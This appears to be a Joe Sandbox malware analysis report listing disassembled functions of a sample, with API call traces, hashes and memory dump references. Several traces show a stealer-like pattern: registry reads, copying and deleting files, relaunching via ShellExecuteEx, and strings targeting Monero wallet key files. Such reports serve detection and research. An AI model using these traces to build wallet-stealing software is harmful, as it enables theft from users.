                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                  • Instruction ID: 9b4c309deb7cde7a862176b624cd069f7200f2a458e0296b3ed85c8889163707
                  • Opcode Fuzzy Hash: 00e2401850bc0e8040b3d468d97a50b1ee6d93b4fe506bfa3eb9ee0c1e250efe
                  • Instruction Fuzzy Hash: 251191B2A44205EBD714DF94E94AF7FBBB8EB44711F10422DF61AA7284D77858009FA0
                  Function 00FC9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(00C8E0B0,?,?,?,00FC140C,?,00C8E0B0,00000000), ref: 00FC926C
                  • lstrcpyn.KERNEL32(011FAB88,00C8E0B0,00C8E0B0,?,00FC140C,?,00C8E0B0), ref: 00FC9290
                  • lstrlen.KERNEL32(?,?,00FC140C,?,00C8E0B0), ref: 00FC92A7
                  • wsprintfA.USER32 ref: 00FC92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                  • Instruction ID: 22ce5e7699ce556979e955153785c421e72d44140cc0869293c44fd52a201396
                  • Opcode Fuzzy Hash: 1f2d713b0105dea11d874a2b9abbde0cbbde1ce96a7a26cb27052cefe3a54edc
                  • Instruction Fuzzy Hash: D401E975500108FFCB08DFE8D988EAE7BB9EF44350F10854CF90D97204C675AA41DB90
                  Function 00FB12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00FB12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00FB12F5
                  • RegCloseKey.ADVAPI32(?), ref: 00FB12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                  • Instruction ID: 5f1f182d3099c857601fbd94634889fa4a076a77d579c8c53897f02e0a68323b
                  • Opcode Fuzzy Hash: 9ebac140fa1e4e1b5d9a7617492cb2ab80855aebfd3d8c1521332f8dda39bcc8
                  • Instruction Fuzzy Hash: 3A0136B9A40208BFDB14DFD0E849FAEB7B8EF48701F008159FA1997284D675AA418F50
                  Function 00FCC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Type
                  • String ID:
                  • API String ID: 2109742289-3916222277
                  • Opcode ID: f646b16dc95dd8bf46fe2c20081a78eb61871284264bc237f77b068c08309af9
                  • Instruction ID: f843f8a101bf6f881f9a5d989943a09fd95182f8f7b11bc02ccf8a657418835f
                  • Opcode Fuzzy Hash: f646b16dc95dd8bf46fe2c20081a78eb61871284264bc237f77b068c08309af9
                  • Instruction Fuzzy Hash: 7D41F6B150079D5EDB218B24CE86FFB7BF89F45704F1444ECE98E86182D2719A45EFA0
                  Function 00FC6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00FC6663
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC6726
                  • ExitProcess.KERNEL32 ref: 00FC6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: e750acf5ad003f382054451ae9ebdbcdc71b811f41550c9f67278f567ddafef0
                  • Instruction ID: 42cba3e3a9a002c234a48443144b782b92c4bcde464dff908591c50b4ec652ce
                  • Opcode Fuzzy Hash: e750acf5ad003f382054451ae9ebdbcdc71b811f41550c9f67278f567ddafef0
                  • Instruction Fuzzy Hash: 9D3127B1801219ABDB18EB90DD96FDEB778AF04304F40419CF21A67191DF787A89CF69
                  Function 00FC87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00FD0E28,00000000,?), ref: 00FC882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8836
                  • wsprintfA.USER32 ref: 00FC8850
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 97559932c1d29ec085668a0e25b11f96bca4606a026eb8f366b15e7e2e809f76
                  • Instruction ID: d6ffc9b9fc95058f3404cfa4c31e5175fee011c06f0c84c597251cff14cdf1dd
                  • Opcode Fuzzy Hash: 97559932c1d29ec085668a0e25b11f96bca4606a026eb8f366b15e7e2e809f76
                  • Instruction Fuzzy Hash: 602145B1A40204AFDB14DF94ED45FAEBBB8FF48711F10411DF519A7284C7799941CBA1
                  Function 00FC8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00FC951E,00000000), ref: 00FC8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC8D62
                  • wsprintfW.USER32 ref: 00FC8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: ebde4c9f95ee8d98aa174a1a2a44471ae383abf8dbd0c3c03eb0d5d2dc883173
                  • Instruction ID: 90b577a719f1b63bf012ab3574f7b16841afbf3b806d09f3860d7c71333e553d
                  • Opcode Fuzzy Hash: ebde4c9f95ee8d98aa174a1a2a44471ae383abf8dbd0c3c03eb0d5d2dc883173
                  • Instruction Fuzzy Hash: A1E08CB1A40208BFC724DB94E80AE6977B8EF44702F0001A8FD0E87280DAB59E409B91
                  Function 00FBA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBA2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00FBA3FF
                  • lstrlen.KERNEL32(00000000), ref: 00FBA6BC
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBA743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 1447707e4242ea490068081806018d61168f43a41ecb67475d3c93d6d00ddcd3
                  • Instruction ID: 21ca0e65dff4f0f7aaf1427637991e22807d002674151c3fc9586a6d8cff4e6c
                  • Opcode Fuzzy Hash: 1447707e4242ea490068081806018d61168f43a41ecb67475d3c93d6d00ddcd3
                  • Instruction Fuzzy Hash: EAE1DB7281010D9BDB18EBA4DE93FEE7338AF54304F50816DF51672091EE387A49EB66
                  Function 00FBD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD481
                  • lstrlen.KERNEL32(00000000), ref: 00FBD698
                  • lstrlen.KERNEL32(00000000), ref: 00FBD6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBD72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: a75bfe8e350782005c121ae9a14b5029058e4fae62073dcbe7bdebca387d1896
                  • Instruction ID: 7e873073a0e6edc34a273b52b12469a10ce51a73c8f5adaa84402bd04da29c83
                  • Opcode Fuzzy Hash: a75bfe8e350782005c121ae9a14b5029058e4fae62073dcbe7bdebca387d1896
                  • Instruction Fuzzy Hash: 67910C7281010D9BDB18EBA0DE97FEE7338AF54304F50416DF516A6091EF387A49EB62
                  Function 00FBD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                    • Part of subcall function 00FC8B60: GetSystemTime.KERNEL32(00FD0E1A,00C8A450,00FD05AE,?,?,00FB13F9,?,0000001A,00FD0E1A,00000000,?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FC8B86
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FBD801
                  • lstrlen.KERNEL32(00000000), ref: 00FBD99F
                  • lstrlen.KERNEL32(00000000), ref: 00FBD9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00FBDA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9b1df329743b4e179e564fb43d0c3fe5453dc7120fbb76d7c4b26955cb8d63fe
                  • Instruction ID: d5d09f1522e42409ef83b769e177af14e2bb0e62b68ae190203567afebf6f8df
                  • Opcode Fuzzy Hash: 9b1df329743b4e179e564fb43d0c3fe5453dc7120fbb76d7c4b26955cb8d63fe
                  • Instruction Fuzzy Hash: D181FB7291010D9BDB18EBA0DE97FEE7338AF54304F50412DF416A60D1EE387A49EB62
                  Function 00FBF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                    • Part of subcall function 00FB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                    • Part of subcall function 00FB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
